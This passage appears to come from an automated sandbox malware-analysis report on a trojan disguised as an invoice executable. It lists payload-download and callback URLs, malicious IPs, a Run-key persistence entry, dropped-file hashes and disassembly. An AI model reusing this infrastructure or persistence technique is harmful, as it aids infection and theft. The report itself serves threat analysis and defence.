https://statuswar.info/GHDFR/bin_rOlFDOAa61.binO	draft_inv dec21.exe, 00000008.00000002.6920230335.0000000000852000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://outlook.comUser6	explorer.exe, 0000000A.00000000.6846488668.0000000009A5F000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.7079654654.0000000009A5F000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6747800110.0000000009A5F000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6798490214.0000000009A5F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.foreca.com	explorer.exe, 0000000A.00000000.6842091530.00000000055B4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.7074720251.00000000055B4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6793949002.00000000055B4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6743868804.00000000055B4000.00000004.00000001.sdmp	false		high
https://statuswar.info/1	draft_inv dec21.exe, 00000008.00000002.6920468519.0000000000871000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://api.msn.com/v1/news/Feed/Windows?activityId=5696A836803C42E0B53F7BB2770E5342&timeOut=10000&o	explorer.exe, 0000000A.00000000.6842091530.00000000055B4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.7074720251.00000000055B4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6793949002.00000000055B4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6743868804.00000000055B4000.00000004.00000001.sdmp	false		high
http://181ue.com/sq.html?entry=	svchost.exe, 0000000B.00000002.11095222346.00000000041D2000.00000004.00020000.sdmp	false	Avira URL Cloud: safe	unknown
https://statuswar.info/GHDFR/bin_rOlFDOAa61.bin9	draft_inv dec21.exe, 00000008.00000002.6920230335.0000000000852000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/?ocid=iehp	explorer.exe, 0000000A.00000000.6769023376.0000000011483000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6866481600.0000000011483000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6818418295.0000000011483000.00000004.00000001.sdmp	false		high
https://www.msn.com/de-ch/?ocid=iehpd	explorer.exe, 0000000A.00000000.7079491196.0000000009A47000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6747662969.0000000009A47000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6846369440.0000000009A47000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6798323210.0000000009A47000.00000004.00000001.sdmp	false		high
https://api.msn.com/	explorer.exe, 0000000A.00000000.6845627993.00000000099AD000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6746869625.00000000099AD000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6797467749.00000000099AD000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.7078654239.00000000099AD000.00000004.00000001.sdmp	false		high
https://windows.msn.com:443/shell	explorer.exe, 0000000A.00000000.6842091530.00000000055B4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.7074720251.00000000055B4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6793949002.00000000055B4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6743868804.00000000055B4000.00000004.00000001.sdmp	false		high
https://www.msn.com/en-us/news/crime/charges-man-snapped-killed-4-then-left-bodies-in-field/ar-AAOGa	explorer.exe, 0000000A.00000000.6842091530.00000000055B4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.7074720251.00000000055B4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6793949002.00000000055B4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6743868804.00000000055B4000.00000004.00000001.sdmp	false		high
https://www.msn.com:443/en-us/feed	explorer.exe, 0000000A.00000000.6842091530.00000000055B4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.7074720251.00000000055B4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6793949002.00000000055B4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6743868804.00000000055B4000.00000004.00000001.sdmp	false		high
https://www.avto-click.com/n8ds/?gHl=36nvuDOhb	svchost.exe, 0000000B.00000002.11095222346.00000000041D2000.00000004.00020000.sdmp	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
198.54.117.217	parkingpage.namecheap.com	United States	22612	NAMECHEAP-NETUS	false
35.244.144.199	www.gdav130.xyz	United States	15169	GOOGLEUS	false
216.250.120.206	www.writingmomsobitwithmom.com	United States	8560	ONEANDONE-ASBrauerstrasse48DE	true
34.117.168.233	td-ccm-168-233.wixdns.net	United States	139070	GOOGLE-AS-APGoogleAsiaPacificPteLtdSG	true
3.64.163.50	www.inklusion.online	United States	16509	AMAZON-02US	true
185.98.5.234	www.avto-click.com	Kazakhstan	200532	HOSTER-KZHosterKZ-hostinganddomainservicesinKazakhs	true
44.227.76.166	www.apps365.one	United States	16509	AMAZON-02US	true
50.118.200.120	www.mariforum.com	United States	18779	EGIHOSTINGUS	true
185.68.16.57	www.dubaicars.online	Ukraine	200000	UKRAINE-ASUA	true
154.23.172.127	dczhd.com	United States	174	COGENT-174US	true
34.237.47.210	previewbrizycloudnlbv2-664b147e649a860c.elb.us-east-1.amazonaws.com	United States	14618	AMAZON-AESUS	false
199.59.242.153	www.effective.store	United States	395082	BODIS-NJUS	true
66.29.140.185	www.lopsrental.lease	United States	19538	ADVANTAGECOMUS	true
185.61.153.97	dif-directory.xyz	United Kingdom	22612	NAMECHEAP-NETUS	true
81.2.194.128	growebox.com	Czech Republic	24806	INTERNET-CZKtis238403KtisCZ	true
203.170.80.250	www.mackthetruck.com	Australia	38719	DREAMSCAPE-AS-APDreamscapeNetworksLimitedAU	true
164.155.212.139	www.ayudavida.com	South Africa	26484	IKGUL-26484US	true
162.241.120.147	statuswar.info	United States	46606	UNIFIEDLAYER-AS-1US	true
34.102.136.180	heyvecino.com	United States	15169	GOOGLEUS	false
104.21.82.227	www.ozattaos.xyz	United States	13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	531747
Start date:	01.12.2021
Start time:	10:29:46
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 15m 12s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	draft_inv dec21.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Run name:	Suspected Instruction Hammering
Number of analysed new started processes analysed:	16
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@8/2@68/20
EGA Information:	Successful, ratio: 100%
HDC Information:	Failed
HCA Information:	Successful, ratio: 61% Number of executed functions: 73 Number of non-executed functions: 50
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe, audiodg.exe, RuntimeBroker.exe, ShellExperienceHost.exe, backgroundTaskHost.exe, svchost.exe Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, spclient.wg.spotify.com, wdcpalt.microsoft.com, ctldl.windowsupdate.com, wdcp.microsoft.com, nexusrules.officeapps.live.com, arc.msn.com Not all processes where analyzed, report is missing behavior information Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
10:40:05	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run FFR0FTBP C:\Program Files (x86)\Te6-t4\zbcdidj04hd0ibmx.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
198.54.117.217	Swift Copy TT.doc	Get hash	malicious	Browse	www.hudsoncm.com/x2bt/?RnYXZ=WbLysAxbxo6G/BxVcQnAylHxavc9det28tsqC+ZYcTz6iybvC6LDPr7VXUbbRpdMc4Deiw==&5jC=cjAPxlG0yV-H52L0
	eFSFIMudyc.exe	Get hash	malicious	Browse	www.datingapes.com/fa83/?BBa8Xp8=2gf5ECY41MBrPn4PQE0OxZgb4tfw53/YVzlfrXwm2r/g9mALQPAYrRlXf/OQnRs6Mlj7&d0=x48pOHr81N6H7
	VSL_MV HANNOR.exe	Get hash	malicious	Browse	www.bimanbangladesh.net/i44q/?6lW=80TJFASZkdFAS+v8aFfVHJx7N4RUwss5XkjMh7TyM6ywfdVCOLZNPJt4bGAhF3YVfSRZVQmHQw==&b41PKV=ORGDeXexm62
	DHL express 5809439160_pdf.exe	Get hash	malicious	Browse	www.reiki.sbs/asva/?0DHp3RF=Y4WLaj4rwQC4e69Jkj7JE66Xn1FcssUnzU9bDJ6hu2QJRqy6Xqijm38MYjA5pQkXxKgnqjSv2Q==&kPMHc8=_0Dd-Hq
	97Pl742Uow.exe	Get hash	malicious	Browse	www.starfish.press/g2fg/?4hL=-ZQ0qH&0DH4lt=lWcjeiBn1ll7CM8xMN3rvx7EqhokJu38IqueC5AXNKEZy9cejX9fFViukbY1qPLphXQq
	aD1yIqGIQS.exe	Get hash	malicious	Browse	www.boogyverse.net/9gr5/?y8OpWB=ejf3HVwsRda3aqzXKK4p3SBfd+bDguDqTiwAOZoWFaeGDhrjyJJtOMat5QEEFXC+Sp2X&8p=-ZPD_V48vZz
	Ez6r9fZIXc.exe	Get hash	malicious	Browse	www.latinafinance.xyz/ad6n/?G8a0vHm=GhQcs+0bfdz+Xv491apJjqPwL60uslin/+rR44PbSJxVrxsZ/xlSsjk5GxkPLS9AJb7w&6lrHq=5jktfN6hH6
	MDXAR5336e.exe	Get hash	malicious	Browse	www.vamp4883.com/fg6s/?jZstah08=Sh+bEy+6UPeScAr2tVEYxnRz2jLNBHdmnou7o/TifmyaXhvXjZ4aKLx2Bj8RLvBIguxt&v8b=FbWxel3X9XkXdxlp
	Pending Invoice 38129337.exe	Get hash	malicious	Browse	www.dingermail.com/ea0r/?R48x=wGvVJuRdvnJ0Y79BcnYp7XZVHi/z1kHH+D2BHLa04/+U5y9TNeOAHaON463AIyuV9EbJ&u6m=PzuX9F1PvP
	ORDER REMINDER.doc	Get hash	malicious	Browse	www.konyamall.com/zaip/?r2JPlFDH=LVn0OuNdVjrsr0cJYNuqCZTvjwFfyUmIrluohlZCQeJ84GUBhtwsCDqJXXbKuDvHi7X4qw==&Ozu8Z=qxoHsxEPs4u
	goGZ1Tg0WT.exe	Get hash	malicious	Browse	www.fuckingmom88.xyz/scb0/?IFQtM=L++/xarH7+KQY0QSYiaHsiSlf6hCEnaHadcGIyH4VUBFSbbzeY0Ouqa2PjdQ9sF0LvN9&5jU=1bC4qz
	URevz9NlFG.exe	Get hash	malicious	Browse	www.jamesobrien.school/cy88/?GVc=8FjHsLvdenPEG0osfO6opS3gt6jIzFiDi5ID2ZobyT37Lz5IcpDRC4jKdE55dJfOvXqaYx9qKw==&Z2MD6=u0Gd9V1hzFB
	PO_4987125644.exe	Get hash	malicious	Browse	www.directreport.net/snr6/?GtxDL8l8=zLBBaFvmQ2fFb/sZ3oL8IGURhiVspx5mLcoK5ms7ABPTsLntFNk3QPTRR6KArJu8yKJF&3fFHMH=R6A82f8xhHpH5lIP
	Inquiry List.exe	Get hash	malicious	Browse	www.aishweb.services/cs7h/?nR=7AdIRizhNJVx1fW5FroRVebER3asAR9TAL9+FwRxL1dlOnlkbMgCPrjR0PaBbOXR2Qg1&mXjPH=0n2LIN7xhx
	November 2021 Update RFQ 3271737.exe	Get hash	malicious	Browse	www.boatiquewear.com/nc26/?D48=c2MHtVyHNxCxXp7&SBZL=aEY/YMYpbkL4yY4jfHTepkPMmo9eIv0vFHQU4wL+llW2ZY+JUxJFvZvQY9b/wa+08WK7
	rMLVGb8I0B.exe	Get hash	malicious	Browse	www.planefiles.com/sywu/?UbkpD0=9tkHYVk6Q5gM/thbPicC6fYDeX/sdO4lNpcfHo4M8anU30F1+WIVIxQVrReHTUjNHT/O4X3m8g==&4h=8pkXz
	Order 2021-822.lzh	Get hash	malicious	Browse	www.paypaw.net/eg62/?0DKP8x=lFNTHJB8x&bZ8x3p=FBC25UiVAlHcbqRDZA7TKj1tuQ2pEq0ox/QoF3NsBRX3VEr/yxZYEGwUHS7U0Zm2c3rj
	eLL1MVwOME.exe	Get hash	malicious	Browse	www.minibustaxiservice.com/sywu/?bN90g=JTsp4zoP3f&BR=mu3ilhWe+jMB/J9XCkx+wAfnYEkyh6/AM6asXz7A2TGRjrz6HY3zQDJPYbOxaLzt7mJu
	oE0LTpFfM5.exe	Get hash	malicious	Browse	www.pheasa.com/sywu/?TBut=BQWKLZqw2LUEf9bwIGBOhz3kcEiVnMegmaKYgXR+gOWg4c6TzHqkk46KjEQN4I0PyIUK&vZht5=VvQH
	Swift Payment Copy.exe	Get hash	malicious	Browse	www.selfhealthcare.club/ku75/?4hh=XRFp70Xhat3amKjf4irDoVaqeYVKDzM27VC57e1FtbrGiW/hSl/lPwNqC6kXunxtYuiY&M6Cl2R=nPYXYLl8PdylYDB
216.250.120.206	AWB_SHIPPING DOCS.exe	Get hash	malicious	Browse	www.writingmomsobitwithmom.com/n8ds/?9rJT=f/B16EdvHg/4mql2vq5Md1sx/t71Njj4R8zlekrOfJu06zuLM7yaFZuMLQOQaJsZfcYK&at=WtR4GZm

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
td-ccm-168-233.wixdns.net	DHL Contact Form.xlsx	Get hash	malicious	Browse	34.117.168.233
	0001100029021.exe	Get hash	malicious	Browse	34.117.168.233
	Sifaris verin.9098865432.PDF.exe	Get hash	malicious	Browse	34.117.168.233
	52HtUORmd4.exe	Get hash	malicious	Browse	34.117.168.233
	S9yf6BkjhTQUbHE.exe	Get hash	malicious	Browse	34.117.168.233
	ORDER K0-9110.exe	Get hash	malicious	Browse	34.117.168.233
	vbc.exe	Get hash	malicious	Browse	34.117.168.233
	DHL express 5809439160_pdf.exe	Get hash	malicious	Browse	34.117.168.233
	Revised Shipping Documents 385099_pdf.exe	Get hash	malicious	Browse	34.117.168.233
	vGULtWc6Jh.exe	Get hash	malicious	Browse	34.117.168.233
	rfq.exe	Get hash	malicious	Browse	34.117.168.233
	DHL50458006SHP.exe	Get hash	malicious	Browse	34.117.168.233
	New order 7nbm471.exe	Get hash	malicious	Browse	34.117.168.233
	Swift Copy MT103.exe	Get hash	malicious	Browse	34.117.168.233
	triage_dropped_file.exe	Get hash	malicious	Browse	34.117.168.233
	DHL_Delivery_Confirmation.exe	Get hash	malicious	Browse	34.117.168.233
	Swift Payment Copy.exe	Get hash	malicious	Browse	34.117.168.233
	SWIFT Transfer 103 000000999315.xlsx	Get hash	malicious	Browse	34.117.168.233
	Order 0091.exe	Get hash	malicious	Browse	34.117.168.233
	EwrGOFT5pd.exe	Get hash	malicious	Browse	34.117.168.233
previewbrizycloudnlbv2-664b147e649a860c.elb.us-east-1.amazonaws.com	BL_CI_PL.exe	Get hash	malicious	Browse	34.237.47.210
	AWB_SHIPPING DOCS.exe	Get hash	malicious	Browse	34.237.47.210
	PO 2420208.exe	Get hash	malicious	Browse	34.237.47.210
	https://blackberry4660212.brizy.site/	Get hash	malicious	Browse	34.237.47.210
	https://blackberry4660212.brizy.site/	Get hash	malicious	Browse	34.237.47.210

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
NAMECHEAP-NETUS	Overdue Invoice.exe	Get hash	malicious	Browse	198.54.117.215
	SOA.exe	Get hash	malicious	Browse	37.61.238.59
	Statement 12-01-2021.exe	Get hash	malicious	Browse	198.54.117.215
	Sz4lxTmH7r.exe	Get hash	malicious	Browse	199.192.28.206
	77isbA5bpi.exe	Get hash	malicious	Browse	198.54.117.218
	REMITTANCE ADVICE.xlsx	Get hash	malicious	Browse	198.54.117.218
	Sat#U0131n alma emri.exe	Get hash	malicious	Browse	162.0.239.47
	ORDER N.42021.exe	Get hash	malicious	Browse	198.54.117.211
	Anexo I e II do convite#U00b7pdf.exe	Get hash	malicious	Browse	63.250.34.171
	Purchase Order.exe	Get hash	malicious	Browse	198.187.31.121
	Linux_amd64	Get hash	malicious	Browse	198.54.115.142
	Linux_x86	Get hash	malicious	Browse	185.61.153.120
	hNfqWik7qw.exe	Get hash	malicious	Browse	198.54.117.244
	RFQ...3463#.exe	Get hash	malicious	Browse	198.54.117.218
	0cgyGHN5k8.exe	Get hash	malicious	Browse	198.54.117.211
	QfXk1qRIDN.exe	Get hash	malicious	Browse	63.250.34.171
	s8b4XYptUi.exe	Get hash	malicious	Browse	198.54.117.215
	Dhl_AWB5032675620,pdf.exe	Get hash	malicious	Browse	198.54.121.168
	ASEA METAL-PRODUCT LIST294#U007eMB - Copy.doc	Get hash	malicious	Browse	198.54.117.211
	Quotation - Linde Tunisia PLC....xlsx	Get hash	malicious	Browse	198.54.117.210
ONEANDONE-ASBrauerstrasse48DE	CgEOfPBqz1.exe	Get hash	malicious	Browse	217.160.0.121
	Document.xlsx	Get hash	malicious	Browse	217.160.233.219
	xPj5d9l2Qg	Get hash	malicious	Browse	74.208.211.172
	Linux_amd64	Get hash	malicious	Browse	82.223.128.104
	PURCHASED ORDER CONFIRMATION UGANDA.xlsx	Get hash	malicious	Browse	77.68.118.64
	ftgSUfxxkX.exe	Get hash	malicious	Browse	217.160.0.89
	Refteck Purchase Order - ME1540018485.doc	Get hash	malicious	Browse	217.160.0.86
	6mG1K5wMEu.exe	Get hash	malicious	Browse	217.160.0.250
	PURCHASE ORDER HECTRO.xlsx	Get hash	malicious	Browse	74.208.236.211
	chizzy.exe	Get hash	malicious	Browse	74.208.236.125
	LBHkeG0UJk1YkgS.exe	Get hash	malicious	Browse	74.208.236.102
	TPS2104503 #U7ff0#U806f G519 BL DRAFT.exe	Get hash	malicious	Browse	217.160.0.213
	QUOTATION REQUEST DOCUMENTS - GOTO TRADING.exe	Get hash	malicious	Browse	217.160.0.229
	71rSPOfhE6.exe	Get hash	malicious	Browse	74.208.236.123
	QUOTE.exe	Get hash	malicious	Browse	217.160.0.159
	vbc.exe	Get hash	malicious	Browse	217.160.0.5
	Incorrect_Payment Details MT144_SWIFT.exe	Get hash	malicious	Browse	74.208.236.24
	PO-2003451.xlsx	Get hash	malicious	Browse	217.160.233.219
	justificante de la transfer.exe	Get hash	malicious	Browse	213.165.67.102
	PO-2003451.xlsx	Get hash	malicious	Browse	217.160.233.219

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
37f463bf4616ecd445d4a1937da06e19	Nh3xqMPynb.exe	Get hash	malicious	Browse	162.241.120.147
	#Encoder_n1.exe	Get hash	malicious	Browse	162.241.120.147
	#Encoder_n2.exe	Get hash	malicious	Browse	162.241.120.147
	iU17wh2uUd.exe	Get hash	malicious	Browse	162.241.120.147
	iU17wh2uUd.exe	Get hash	malicious	Browse	162.241.120.147
	counter-119221000.xls	Get hash	malicious	Browse	162.241.120.147
	PURCHASE ORDER.exe	Get hash	malicious	Browse	162.241.120.147
	5243F620073F2AD7C464410D59B34794525CF6875498D.exe	Get hash	malicious	Browse	162.241.120.147
	phish.htm	Get hash	malicious	Browse	162.241.120.147
	box-1688169224.xlsb	Get hash	malicious	Browse	162.241.120.147
	box-1689035414.xlsb	Get hash	malicious	Browse	162.241.120.147
	html.html	Get hash	malicious	Browse	162.241.120.147
	#Ud83d#Udce9-susan.hinds6459831.htm	Get hash	malicious	Browse	162.241.120.147
	phish.htm	Get hash	malicious	Browse	162.241.120.147
	OJypySurXg.exe	Get hash	malicious	Browse	162.241.120.147
	f7Kudio57m.exe	Get hash	malicious	Browse	162.241.120.147
	RFIlSRQKzj.exe	Get hash	malicious	Browse	162.241.120.147
	bjDDx3RtEZ.exe	Get hash	malicious	Browse	162.241.120.147
	8069-wav-audio-carl.rackley-Hancockwhitney.html	Get hash	malicious	Browse	162.241.120.147
	ajTlXKBm6k.exe	Get hash	malicious	Browse	162.241.120.147

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Temp\Te6-t4\zbcdidj04hd0ibmx.exe Download File
Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	135168
Entropy (8bit):	5.94335884500492
Encrypted:	false
SSDEEP:	3072:9U8IySFndx820q1KtKiNaoLbi/gRN1bmwADH:9UkSFd22j1KvfEgHJO
MD5:	89A584ACAEB2F9E8BAF46714EB7D3550
SHA1:	263FF0B238D57CFC30492F8801530B9986DCAE38
SHA-256:	59AE017767F6A56EBA79ABDAD1343CBA3643744F4668B320C30FDA283ABDEDF2
SHA-512:	299B531915221FD0003E2F526C7AC529D948524A065DDE767C4D638F4121CD62D3A70E67BCA3C013BAF79CF98F67D9F84B5097327DFDBA2D4FFD4B10DC571241
Malicious:	true
Antivirus:	Antivirus: Metadefender, Detection: 20%, Browse Antivirus: ReversingLabs, Detection: 18%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......7b..s...s...s.......r...<!..v...E%..r...Richs...........................PE..L...W.aL.....................0......h.............@.......................... ......K...........................................(.......P...................................................................8... ....................................text...p........................... ..`.data...............................@....rsrc...P...........................@..@...I............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF3F74DA73951D2623.TMP Download File
Process:	C:\Users\user\Desktop\draft_inv dec21.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.6374754921163319
Encrypted:	false
SSDEEP:	12:rl3lKFQCb77z4cl9ZgFLGVwtn4+jbxO/37X6XMRZnAX3CqFZlUoz:r8JloFP1jbxOfLhlAX3CAZlj
MD5:	26F4DF069A76EC44D3497157CFC2A7FF
SHA1:	4FFDEDEB83278CA75D0AAE246C6451342C6A763F
SHA-256:	B83265C7FB0E0239E55E32B503B9D73689FC800BCF26E8670284B2BCF805841B
SHA-512:	161E06993EE630FC83DD0A17D0B2370FF69173EAD77E385A4396E5E921C2037A2547FBEF7CD3B9E605ABE1960C928C158CB9D6C6479A4BD232F5790574AD029A
Malicious:	false
Reputation:	low
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	5.94335884500492
TrID:	Win32 Executable (generic) a (10002005/4) 99.15% Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	draft_inv dec21.exe
File size:	135168
MD5:	89a584acaeb2f9e8baf46714eb7d3550
SHA1:	263ff0b238d57cfc30492f8801530b9986dcae38
SHA256:	59ae017767f6a56eba79abdad1343cba3643744f4668b320c30fda283abdedf2
SHA512:	299b531915221fd0003e2f526c7ac529d948524a065dde767c4d638f4121cd62d3a70e67bca3c013baf79cf98f67d9f84b5097327dfdba2d4ffd4b10dc571241
SSDEEP:	3072:9U8IySFndx820q1KtKiNaoLbi/gRN1bmwADH:9UkSFd22j1KvfEgHJO
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......7b..s...s...s.......r...<!..v...E%..r...Richs...........................PE..L...W.aL.....................0......h.............@

File Icon


Icon Hash:	98989c98b8787c00

Static PE Info

General
Entrypoint:	0x401668
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:	0x4C61B357 [Tue Aug 10 20:15:19 2010 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	a7de590cc5b951bdfc15c3f8afbf7326

Entrypoint Preview

Instruction
push 00402250h
call 00007F7EF91CC375h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
cmp byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
cmp edi, ebx
std
call far fword ptr [edx]
sub byte ptr [edi], dh
dec ecx
xchg eax, esi
loope 00007F7EF91CC322h
wait
jmp 00007F7EF91CC38Dh
mov esp, 00000098h
add byte ptr [eax], al
add byte ptr [ecx], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax+45h], cl
dec esi
push ebx
dec edi
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add bh, bh
int3
xor dword ptr [eax], eax
sub eax, 8ABA351Dh
cmp ch, bh
mov esi, 0468A643h
cwde
or al, C1h
imul eax
xor byte ptr [edi-2064A690h], bl
inc esp
mov cs, cx
nop
movsd
push ss
stosb
dec esp
cmp cl, byte ptr [edi-53h]
xor ebx, dword ptr [ecx-48EE309Ah]
or al, 00h
stosb
add byte ptr [eax-2Dh], ah
xchg eax, ebx
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
scasd
or al, byte ptr [eax]
add bl, cl
add eax, dword ptr [eax]
add byte ptr [eax], al
push es
add byte ptr [ecx+ecx*2+4Ch], dl
inc edx
inc ecx
inc edi
add byte ptr [4D000601h], cl
jne 00007F7EF91CC3FCh
jp 00007F7EF91CC3EEh
xor eax, dword ptr [eax]
sbb dword ptr [ecx], eax
add byte ptr [edx+00h], al
and al, byte ptr [ecx]
and eax, dword ptr [esi+00000003h]

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1de84	0x28	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x21000	0x750	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x238	0x20
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x1f4	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x1d570	0x1e000	False	0.558390299479	data	6.27464824978	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0x1f000	0x1a18	0x1000	False	0.00634765625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x21000	0x750	0x1000	False	0.18310546875	data	1.93536831113	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x213e8	0x368	GLS_BINARY_LSB_FIRST
RT_GROUP_ICON	0x213d4	0x14	data
RT_VERSION	0x210f0	0x2e4	data	English	United States

Imports

DLL

Import

MSVBVM60.DLL

